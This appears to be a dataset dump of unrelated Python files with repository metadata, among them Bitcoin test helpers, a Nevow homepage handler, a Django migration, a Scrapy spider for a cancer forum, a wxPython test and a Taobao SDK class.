txid = from_node.sendrawtransaction(signresult["hex"], True)
return (txid, signresult["hex"])
def random_zeropri_transaction(nodes, amount, min_fee, fee_increment, fee_variants):
"""
Create a random zero-priority transaction.
Returns (txid, hex-encoded-transaction-data, fee)
"""
from_node = random.choice(nodes)
to_node = random.choice(nodes)
fee = min_fee + fee_increment*random.randint(0,fee_variants)
(txid, txhex) = send_zeropri_transaction(from_node, to_node, amount, fee)
return (txid, txhex, fee)
def random_transaction(nodes, amount, min_fee, fee_increment, fee_variants):
"""
Create a random transaction.
Returns (txid, hex-encoded-transaction-data, fee)
"""
from_node = random.choice(nodes)
to_node = random.choice(nodes)
fee = min_fee + fee_increment*random.randint(0,fee_variants)
(total_in, inputs) = gather_inputs(from_node, amount+fee)
outputs = make_change(from_node, total_in, amount, fee)
outputs[to_node.getnewaddress()] = float(amount)
rawtx = from_node.createrawtransaction(inputs, outputs)
signresult = from_node.signrawtransaction(rawtx)
txid = from_node.sendrawtransaction(signresult["hex"], True)
return (txid, signresult["hex"], fee)
def assert_equal(thing1, thing2):
if thing1 != thing2:
raise AssertionError("%s != %s"%(str(thing1),str(thing2)))
def assert_greater_than(thing1, thing2):
if thing1 <= thing2:
raise AssertionError("%s <= %s"%(str(thing1),str(thing2)))
def assert_raises(exc, fun, *args, **kwds):
try:
fun(*args, **kwds)
except exc:
pass
except Exception as e:
raise AssertionError("Unexpected exception raised: "+type(e).__name__)
else:
raise AssertionError("No exception raised")
def assert_is_hex_string(string):
try:
int(string, 16)
except Exception as e:
raise AssertionError(
"Couldn't interpret %r as hexadecimal; raised: %s" % (string, e))
def assert_is_hash_string(string, length=64):
if not isinstance(string, basestring):
raise AssertionError("Expected a string, got type %r" % type(string))
elif length and len(string) != length:
raise AssertionError(
"String of length %d expected; got %d" % (length, len(string)))
elif not re.match('[abcdef0-9]+$', string):
raise AssertionError(
"String %r contains invalid characters for a hash." % string)
def assert_array_result(object_array, to_match, expected, should_not_find = False):
"""
Pass in array of JSON objects, a dictionary with key/value pairs
to match against, and another dictionary with expected key/value
pairs.
If the should_not_find flag is true, to_match should not be found
in object_array
"""
if should_not_find == True:
assert_equal(expected, { })
num_matched = 0
for item in object_array:
all_match = True
for key,value in to_match.items():
if item[key] != value:
all_match = False
if not all_match:
continue
elif should_not_find == True:
num_matched = num_matched+1
for key,value in expected.items():
if item[key] != value:
raise AssertionError("%s : expected %s=%s"%(str(item), str(key), str(value)))
num_matched = num_matched+1
if num_matched == 0 and should_not_find != True:
raise AssertionError("No objects matched %s"%(str(to_match)))
if num_matched > 0 and should_not_find == True:
raise AssertionError("Objects were found %s"%(str(to_match)))
def satoshi_round(amount):
return Decimal(amount).quantize(Decimal('0.00000001'), rounding=ROUND_DOWN)
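# Example: satoshi_round("0.123456789") == Decimal("0.12345678") -- amounts
# are truncated (ROUND_DOWN), never rounded up, to the eight decimal places
# bitcoind accepts.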
# Helper to create at least "count" utxos
# Pass in a fee that is sufficient for relay and mining new transactions.
def create_confirmed_utxos(fee, node, count):
node.generate(int(0.5*count)+101)
utxos = node.listunspent()
iterations = count - len(utxos)
addr1 = node.getnewaddress()
addr2 = node.getnewaddress()
if iterations <= 0:
return utxos
for i in xrange(iterations):
t = utxos.pop()
inputs = []
inputs.append({ "txid" : t["txid"], "vout" : t["vout"]})
outputs = {}
send_value = t['amount'] - fee
outputs[addr1] = satoshi_round(send_value/2)
outputs[addr2] = satoshi_round(send_value/2)
raw_tx = node.createrawtransaction(inputs, outputs)
signed_tx = node.signrawtransaction(raw_tx)["hex"]
txid = node.sendrawtransaction(signed_tx)
while (node.getmempoolinfo()['size'] > 0):
node.generate(1)
utxos = node.listunspent()
assert(len(utxos) >= count)
return utxos
# Create large OP_RETURN txouts that can be appended to a transaction
# to make it large (helper for constructing large transactions).
def gen_return_txouts():
# Some pre-processing to create a bunch of OP_RETURN txouts to insert into transactions we create
# So we have big transactions (and therefore can't fit very many into each block)
# create one script_pubkey
script_pubkey = "6a4d0200" #OP_RETURN OP_PUSH2 512 bytes
for i in xrange (512):
script_pubkey = script_pubkey + "01"
# concatenate 128 txouts of above script_pubkey which we'll insert before the txout for change
txouts = "81"
for k in xrange(128):
# add txout value
txouts = txouts + "0000000000000000"
# add length of script_pubkey
txouts = txouts + "fd0402"
# add script_pubkey
txouts = txouts + script_pubkey
return txouts
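# Size sketch (illustrative): each OP_RETURN script is 4 + 512 = 516 bytes,
# so every spliced txout serializes to 8 (value) + 3 (0xfd0402 length) +
# 516 = 527 bytes; 128 of them add roughly 67 KB per transaction. The "81"
# prefix is the new output-count varint (0x81 = 129: 128 OP_RETURNs + change).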
def create_tx(node, coinbase, to_address, amount):
inputs = [{ "txid" : coinbase, "vout" : 0}]
outputs = { to_address : amount }
rawtx = node.createrawtransaction(inputs, outputs)
signresult = node.signrawtransaction(rawtx)
assert_equal(signresult["complete"], True)
return signresult["hex"]
# Create a spend of each passed-in utxo, splicing in "txouts" to each raw
# transaction to make it large. See gen_return_txouts() above.
def create_lots_of_big_transactions(node, txouts, utxos, fee):
addr = node.getnewaddress()
txids = []
for i in xrange(len(utxos)):
t = utxos.pop()
inputs = []
inputs.append({ "txid" : t["txid"], "vout" : t["vout"]})
outputs = {}
send_value = t['amount'] - fee
outputs[addr] = satoshi_round(send_value)
rawtx = node.createrawtransaction(inputs, outputs)
newtx = rawtx[0:92]
newtx = newtx + txouts
newtx = newtx + rawtx[94:]
signresult = node.signrawtransaction(newtx, None, None, "NONE")
txid = node.sendrawtransaction(signresult["hex"], True)
txids.append(txid)
return txids
def get_bip9_status(node, key):
info = node.getblockchaininfo()
for row in info['bip9_softforks']:
if row['id'] == key:
return row
    raise IndexError('key:"%s" not found' % key)
| [
"[email protected]"
] | |
fd63524205e878b38ec89f3dc9234285d4d205c8 | db24aad1b8e813a23688cfef4603978e3356b155 | /fastagram/posts/models/__init__.py | 678b999d2e2f24295eb5a61c01ff7b53a8c99bf2 | [] | no_license | yevgnenll/fastagram | b251a9f5ce1b6b30c09c3d5ab3d23a7388a35509 | 0923588e2d6b1e8a2e15bde0e130e64765bcc0ed | refs/heads/develop | 2021-01-10T01:14:16.196153 | 2016-04-06T09:22:18 | 2016-04-06T09:22:18 | 54,695,513 | 2 | 1 | null | 2016-04-06T09:22:18 | 2016-03-25T04:57:31 | Python | UTF-8 | Python | false | false | 75 | py | from .post import Post
from .comment import Comment
from .like import Like
| [
"[email protected]"
] | |
7de8fb97bfda1fbea1f83d3bc24dd88497e0a7b5 | d2c4934325f5ddd567963e7bd2bdc0673f92bc40 | /tests/model_control/detailed/transf_None/model_control_one_enabled_None_ConstantTrend_Seasonal_Minute_LSTM.py | aac22081d0e2dc667f76605a2ce93909efa6bbb6 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | jmabry/pyaf | 797acdd585842474ff4ae1d9db5606877252d9b8 | afbc15a851a2445a7824bf255af612dc429265af | refs/heads/master | 2020-03-20T02:14:12.597970 | 2018-12-17T22:08:11 | 2018-12-17T22:08:11 | 137,104,552 | 0 | 0 | BSD-3-Clause | 2018-12-17T22:08:12 | 2018-06-12T17:15:43 | Python | UTF-8 | Python | false | false | 163 | py | import pyaf.tests.model_control.test_ozone_custom_models_enabled as testmod
testmod.build_model( ['None'] , ['ConstantTrend'] , ['Seasonal_Minute'] , ['LSTM'] ); | [
"[email protected]"
] | |
a3c3350d331393ea83eede2ee19ca9d984c1bfd0 | 589385876626ffdf0e3a960a191eed9b90fa6eb2 | /trunk/aztk/web/user_homepage.py | 0caf42cd3ffc7a4a1681b32a784c6440e5ed2011 | [
"BSD-3-Clause"
] | permissive | BGCX261/zoto-server-svn-to-git | bb7545852bd52d6626f3b2b9c0b1d5834eb08201 | 73abf60264ae5a6b610d19e25be833f0754b160e | refs/heads/master | 2021-01-21T23:04:02.366636 | 2015-08-25T15:16:12 | 2015-08-25T15:16:12 | 41,602,694 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,309 | py | """
dyn_pages/user_homepage.py
Author: Trey Stout
Date Added: ?
User homepage. Also the starting point for all user interior pages.
"""
## STD LIBS
## OUR LIBS
from zoto_base_page import zoto_base_page
from dyn_image_handler import dyn_image_handler
from user_albums import user_albums
from user_galleries import user_galleries
from user_publish import user_publish
from feeds import feeds
from other_sizes import other_sizes
## 3RD PARTY LIBS
from twisted.web.util import redirectTo
from twisted.internet.defer import Deferred
from nevow import loaders, inevow, tags as T
class user_homepage(zoto_base_page):
local_js_includes = [
"countries.js",
"static_news.js",
"select_box.lib.js",
"pagination.lib.js",
"e_paper.lib.js",
"globber.lib.js",
"tag_cloud.lib.js",
"comments.lib.js",
"albums.lib.js",
"featured_media.lib.js",
"widget.lib.js",
"image_detail.lib.js",
"table.lib.js",
"lookahead.lib.js",
"detect.lib.js",
"third_party/swfobject.js",
"messages.lib.js"
]
page_manager_js = "managers/user_homepage.js"
def __init__(self, username):
zoto_base_page.__init__(self)
self.username = username.lower()
def _get_browse_username(self, ctx):
return self.username
def render_my_photo_link(self, ctx, data):
return '/%s/photos/' % self.username
# def get_avatar_permission():
# def handle_info(perm_info):
# if perm_info.get('view_flag', 3):
#
# d = self.app.api.permissions.get_image_permissions(self.username, user_info['avatar_id'])
# d.addCallback(handle_info)
def avatar_handler(self, ctx, size):
request = inevow.IRequest(ctx)
color_option = self._get_color_option(ctx)
bg, fg = color_option.split("_")
def handle_avatar_display(result):
if not result['can_view']:
# generic avatar
return redirectTo('/image/avatar-%d.jpg' % size, request)
else:
# browser has permission to view avatar, so show it
new_segments = [str(size), self.avatar_id]
handler = dyn_image_handler(self.username, self.app, self.log)
handler.set_segments(new_segments)
return handler
def get_auth_username(self):
d2 = Deferred()
auth_hash = request.getCookie('auth_hash')
if auth_hash:
self.auth_username = auth_hash.split(':')[0].lower()
else:
self.auth_username = ""
d2.callback(0)
return d2
# look up id
def handle_info(result):
if result[0] != 0:
return redirectTo('/image/avatar-%d.jpg' % size, request)
user_info = result[1]
# Does the user have an avatar selected
if user_info.get('avatar_id', None):
self.avatar_id = user_info['avatar_id']
# then check if username can view it
d3 = self.app.db.query("""
SELECT zoto_user_can_view_media(
zoto_get_user_id(%s),
zoto_get_image_id(zoto_get_user_id(%s), %s),
zoto_get_user_id(%s)
) AS can_view
""", (self.username, self.username, user_info['avatar_id'], self.auth_username), single_row=True)
d3.addCallback(handle_avatar_display)
return d3
else:
# generic avatar
return redirectTo('/image/bg_%s/%s/avatar-%d.jpg' % (bg, fg, size), request)
def get_user_info(result):
if result[0] != 0:
return redirectTo('/image/bg_%s/%s/avatar-%d.jpg' % (bg, fg, size), request)
return self.app.api.users.get_info(result[1], result[1])
d = get_auth_username(self)
d.addCallback(lambda _: self.app.api.users.get_user_id(self.username))
d.addCallback(get_user_info)
d.addCallback(handle_info)
return d
def child_img(self, ctx):
return dyn_image_handler(self.username, self.app, self.log)
def child_feeds(self, ctx):
return feeds(self.username, self.app, self.log)
def child_albums(self, ctx):
return user_albums(self.username)
def child_galleries(self, ctx):
return user_galleries(self.username)
def child_publish(self, ctx):
return user_publish(self.username)
def child_avatar_small(self, ctx):
return self.avatar_handler(ctx, 11)
def child_avatar_large(self, ctx):
return self.avatar_handler(ctx, 18)
def child_other_sizes(self, ctx):
return other_sizes(self.username)
def childFactory(self, ctx, name):
if name == "":
return self
setattr(user_homepage, "child_avatar.jpg", user_homepage.child_avatar_large)
setattr(user_homepage, "child_avatar-small.jpg", user_homepage.child_avatar_small)
| [
"[email protected]"
] | |
7e19b1f65c28d7e8d33d9f9df1406f25cab5200c | fb652a77dd6dba0c971ac052271e1e03ff7c0d6e | /settings/migrations/0008_auto_20181113_0656.py | 9d9fe0d0ca6b8a4d8782e2b78f2ff35543fb2503 | [] | no_license | ryosuwito/mt-commerce | 5fa8419650d8c089bc8baf75322389141b4522af | 90359dada36ab903dbf30f3ab6616a3c4ed3f655 | refs/heads/master | 2022-12-11T05:22:31.037960 | 2019-03-07T10:59:58 | 2019-03-07T10:59:58 | 169,371,940 | 0 | 0 | null | 2022-12-08T01:21:07 | 2019-02-06T07:56:27 | HTML | UTF-8 | Python | false | false | 592 | py | # Generated by Django 2.0.8 on 2018-11-13 06:56
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('settings', '0007_auto_20181113_0655'),
]
operations = [
migrations.AlterField(
model_name='footerlink',
name='addr',
field=models.CharField(blank=True, max_length=400, null=True),
),
migrations.AlterField(
model_name='headerlink',
name='addr',
field=models.CharField(blank=True, max_length=400, null=True),
),
]
| [
"[email protected]"
] | |
1055e5be5726757fa80bb3ebe93883dab06b38ae | f8ca9769a359795dc649c46e299cd9b3bfca1864 | /forum/spiders/cancer_cancerforums_spider.py | f3a2c67fe128c84d117d7c3248a56d9a73bcdde2 | [] | no_license | florencefantine/ehealth_scraper | d4093a67543f653de200e6610eaaf65842aa322f | 886ed12d0a605584796dea11b532883c1e86d09a | refs/heads/master | 2021-01-10T11:39:58.270130 | 2015-11-24T22:09:34 | 2015-11-24T22:09:34 | 45,852,359 | 1 | 6 | null | 2015-11-24T20:52:28 | 2015-11-09T16:51:54 | Python | UTF-8 | Python | false | false | 3,237 | py | # -*- coding: utf-8 -*-
import scrapy
import hashlib
from scrapy.contrib.spiders import CrawlSpider, Rule
from scrapy.contrib.linkextractors import LinkExtractor
from scrapy.selector import Selector
from forum.items import PostItemsList
import re
from bs4 import BeautifulSoup
import logging
import string
import dateparser
import time
# Spider for crawling Adidas website for shoes
class ForumsSpider(CrawlSpider):
name = "cancer_cancerforums_spider"
allowed_domains = ["www.cancerforums.net"]
start_urls = [
"http://www.cancerforums.net/forums/13-Lung-Cancer-Forum",
"http://www.cancerforums.net/forums/14-Prostate-Cancer-Forum"
]
rules = (
# Rule to go to the single product pages and run the parsing function
# Excludes links that end in _W.html or _M.html, because they point to
# configuration pages that aren't scrapeable (and are mostly redundant anyway)
Rule(LinkExtractor(
restrict_xpaths='//h3/a[@class="title"]',
), callback='parsePostsList'),
# Rule to follow arrow to next product grid
Rule(LinkExtractor(
restrict_xpaths='//span[@class="prev_next"]/a[@rel="next"]'
), follow=True),
)
def cleanText(self, str):
soup = BeautifulSoup(str, 'html.parser')
return re.sub(" +|\n|\r|\t|\0|\x0b|\xa0",' ',soup.get_text()).strip()
def getDate(self,date_str):
# date_str="Fri Feb 12, 2010 1:54 pm"
try:
date = dateparser.parse(date_str)
epoch = int(date.strftime('%s'))
            create_date = time.strftime("%Y-%m-%dT%H:%M:%S%z", time.gmtime(epoch)) # fixed format: unquoted T and restored the minutes:seconds colon
return create_date
except Exception:
#logging.error(">>>>>"+date_str)
return date_str
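    # Example (illustrative): getDate("Fri Feb 12, 2010 1:54 pm") should give
    # "2010-02-12T13:54:00" on a UTC machine; the exact hour depends on the
    # host timezone, because %s/gmtime round-trips through local time.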
# https://github.com/scrapy/dirbot/blob/master/dirbot/spiders/dmoz.py
# https://github.com/scrapy/dirbot/blob/master/dirbot/pipelines.py
def parsePostsList(self,response):
sel = Selector(response)
posts = sel.xpath('//ol[@class="posts"]/li[@class="postbitlegacy postbitim postcontainer old"]')
condition = "cancer"
items = []
topic = response.xpath('//h1/span[@class="threadtitle"]/a/text()').extract_first()
url = response.url
for post in posts:
item = PostItemsList()
item['author'] = post.xpath('.//div[@class="popupmenu memberaction"]/a/strong/text()').extract_first()
item['author_link'] = post.xpath('.//div[@class="popupmenu memberaction"]/a/@href').extract_first()
item['condition'] = condition
item['create_date'] = self.getDate(post.xpath('.//span[@class="date"]/text()').extract_first().replace(',','').strip())
item['domain'] = "".join(self.allowed_domains)
item['post'] = re.sub(r'\s+',' ',self.cleanText(" ".join(post.xpath('.//div[@class="content"]//blockquote/text()').extract())))
# item['tag']=''
item['topic'] = topic
item['url']=url
items.append(item)
return items
| [
"[email protected]"
] | |
792fba203b2bf6fd8ce56981e0f9ed7dc868c823 | 4e879e994720100a9354895af2bb9be33b38a42b | /xUdemy_tkinter/Sect3_1stTkinterApp/45_HelloWorld_01.py | 6391cf50cb181338076904a71e1464d8797f5147 | [] | no_license | pepitogrilho/learning_python | 80314ec97091238ed5cc3ed47422d2e6073a3280 | bbdc78a9a0513c13d991701859bcfe7a8e614a49 | refs/heads/master | 2023-04-09T15:07:08.866721 | 2023-04-02T18:45:47 | 2023-04-02T18:45:47 | 230,527,165 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 110 | py | # -*- coding: utf-8 -*-
"""
"""
import tkinter as tk
from tkinter import ttk
root = tk.Tk()
root.mainloop()
| [
"[email protected]"
] | |
9618d0ea8bcd0e39563734aa75c10cfbf72a6dde | bbd69601912a3361d788efd03a47f9d4e3bac09e | /unittests/test_propgriddefs.py | ba6c67748213bd2fab4de8c1bcd982fff4d23034 | [] | no_license | wxWidgets/Phoenix | 56929484460a0399a8f1d9582bc77c20aa14748d | a1184286703cf24c4b88e5bc14cf2979c1b1ea00 | refs/heads/master | 2023-09-01T07:10:17.437093 | 2023-08-31T05:38:01 | 2023-08-31T05:38:01 | 5,078,061 | 2,268 | 677 | null | 2023-09-09T17:06:59 | 2012-07-17T06:22:25 | Python | UTF-8 | Python | false | false | 1,278 | py | import unittest
from unittests import wtc
import wx
import wx.propgrid as pg
#---------------------------------------------------------------------------
class propgriddefs_Tests(wtc.WidgetTestCase):
def test_propgriddefs1(self):
pg.PG_INVALID_VALUE
pg.PG_DONT_RECURSE
pg.PG_BASE_OCT
pg.PG_BASE_DEC
pg.PG_BASE_HEX
pg.PG_BASE_HEXL
pg.PG_PREFIX_NONE
pg.PG_PREFIX_0x
pg.PG_PREFIX_DOLLAR_SIGN
pg.PG_KEEP_STRUCTURE
pg.PG_RECURSE
pg.PG_INC_ATTRIBUTES
pg.PG_RECURSE_STARTS
pg.PG_FORCE
pg.PG_SORT_TOP_LEVEL_ONLY
pg.PG_FULL_VALUE
pg.PG_REPORT_ERROR
pg.PG_PROPERTY_SPECIFIC
pg.PG_EDITABLE_VALUE
pg.PG_COMPOSITE_FRAGMENT
pg.PG_UNEDITABLE_COMPOSITE_FRAGMENT
pg.PG_VALUE_IS_CURRENT
pg.PG_PROGRAMMATIC_VALUE
pg.PG_SETVAL_REFRESH_EDITOR
pg.PG_SETVAL_AGGREGATED
pg.PG_SETVAL_FROM_PARENT
pg.PG_SETVAL_BY_USER
pg.PG_LABEL
pg.PG_LABEL_STRING
pg.PG_NULL_BITMAP
pg.PG_COLOUR_BLACK
pg.PG_DEFAULT_IMAGE_SIZE
#---------------------------------------------------------------------------
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
53a4aac191b28eea03daa7302e8977d24061472a | e8cac4db53b22a28f7421ede9089bd3d4df81c82 | /TaobaoSdk/Domain/AuthorizeMessage.py | 3d3a557b07f3221566eec45fb68865e80848f9d1 | [] | no_license | wangyu0248/TaobaoOpenPythonSDK | af14e84e2bada920b1e9b75cb12d9c9a15a5a1bd | 814efaf6e681c6112976c58ec457c46d58bcc95f | refs/heads/master | 2021-01-19T05:29:07.234794 | 2012-06-21T09:31:27 | 2012-06-21T09:31:27 | 4,738,026 | 7 | 1 | null | null | null | null | UTF-8 | Python | false | false | 13,921 | py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim: set ts=4 sts=4 sw=4 et:
## @brief Incremental API
# @author [email protected]
# @date 2012-06-09 16:55:43
# @version: 0.0.16
from datetime import datetime
import os
import sys
import time
def __getCurrentPath():
return os.path.normpath(os.path.join(os.path.realpath(__file__), os.path.pardir))
if __getCurrentPath() not in sys.path:
sys.path.insert(0, __getCurrentPath())
## @brief <SPAN style="font-size:16px; font-family:'宋体','Times New Roman',Georgia,Serif;">Incremental API</SPAN>
class AuthorizeMessage(object):
def __init__(self, kargs=dict()):
super(self.__class__, self).__init__()
        ## @brief <SPAN style="color:Blue3; font-size:16px; font-family:'宋体','Times New Roman',Georgia,Serif;">The ISV's AppKey</SPAN>
# <UL>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Type</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">String</SPAN>
# </LI>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Level</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">Basic</SPAN>
# </LI>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Sample</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">12023790</SPAN>
# </LI>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Private</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">true</SPAN>
# </LI>
# </UL>
self.app_key = None
        ## @brief <SPAN style="color:Blue3; font-size:16px; font-family:'宋体','Times New Roman',Georgia,Serif;">The authorized user's Taobao nickname</SPAN>
# <UL>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Type</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">String</SPAN>
# </LI>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Level</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">Basic</SPAN>
# </LI>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Sample</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">我是一个用户名</SPAN>
# </LI>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Private</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">true</SPAN>
# </LI>
# </UL>
self.nick = None
        ## @brief <SPAN style="color:Blue3; font-size:16px; font-family:'宋体','Times New Roman',Georgia,Serif;">The start time of the user's authorization, counted from the day the authorization is granted. start_date marks the beginning of each authorization cycle; if the user extends or modifies the authorization before the cycle ends, this start time does not change. It is only reset when a new cycle begins after the current one has ended</SPAN>
# <UL>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Type</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">Date</SPAN>
# </LI>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Level</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">Basic</SPAN>
# </LI>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Sample</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">2000-01-01 00:00:00</SPAN>
# </LI>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Private</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">true</SPAN>
# </LI>
# </UL>
self.start_date = None
        ## @brief <SPAN style="color:Blue3; font-size:16px; font-family:'宋体','Times New Roman',Georgia,Serif;">The expiration time of the user's authorization</SPAN>
# <UL>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Type</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">Date</SPAN>
# </LI>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Level</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">Basic</SPAN>
# </LI>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Sample</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">2000-01-01 00:00:00</SPAN>
# </LI>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Private</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">true</SPAN>
# </LI>
# </UL>
self.end_date = None
        ## @brief <SPAN style="color:Blue3; font-size:16px; font-family:'宋体','Times New Roman',Georgia,Serif;">The time at which the user created the authorization for the current ISV</SPAN>
# <UL>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Type</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">Date</SPAN>
# </LI>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Level</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">Basic</SPAN>
# </LI>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Sample</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">2000-01-01 00:00:00</SPAN>
# </LI>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Private</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">true</SPAN>
# </LI>
# </UL>
self.created = None
        ## @brief <SPAN style="color:Blue3; font-size:16px; font-family:'宋体','Times New Roman',Georgia,Serif;">The time at which the user's authorization information was last modified</SPAN>
# <UL>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Type</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">Date</SPAN>
# </LI>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Level</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">Basic</SPAN>
# </LI>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Sample</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">2000-01-01 00:00:00</SPAN>
# </LI>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Private</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">true</SPAN>
# </LI>
# </UL>
self.modified = None
        ## @brief <SPAN style="color:Blue3; font-size:16px; font-family:'宋体','Times New Roman',Georgia,Serif;">The user's authorization status: normal or expired</SPAN>
# <UL>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Type</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">String</SPAN>
# </LI>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Level</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">Basic</SPAN>
# </LI>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Sample</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">normal</SPAN>
# </LI>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Private</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">true</SPAN>
# </LI>
# </UL>
self.status = None
        ## @brief <SPAN style="color:Blue3; font-size:16px; font-family:'宋体','Times New Roman',Georgia,Serif;">Whether the user's authorization is currently in effect (in effect means change messages can be received)</SPAN>
# <UL>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Type</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">Boolean</SPAN>
# </LI>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Level</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">Basic</SPAN>
# </LI>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Sample</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">true</SPAN>
# </LI>
# <LI>
# <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Private</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">true</SPAN>
# </LI>
# </UL>
self.valid = None
self.__init(kargs)
def _newInstance(self, name, value):
propertyType = self._getPropertyType(name)
if propertyType == bool:
return value
elif propertyType == datetime:
format = "%Y-%m-%d %H:%M:%S"
return datetime.strptime(value, format)
elif propertyType == str:
return value.encode("utf-8")
else:
return propertyType(value)
def _getPropertyType(self, name):
properties = {
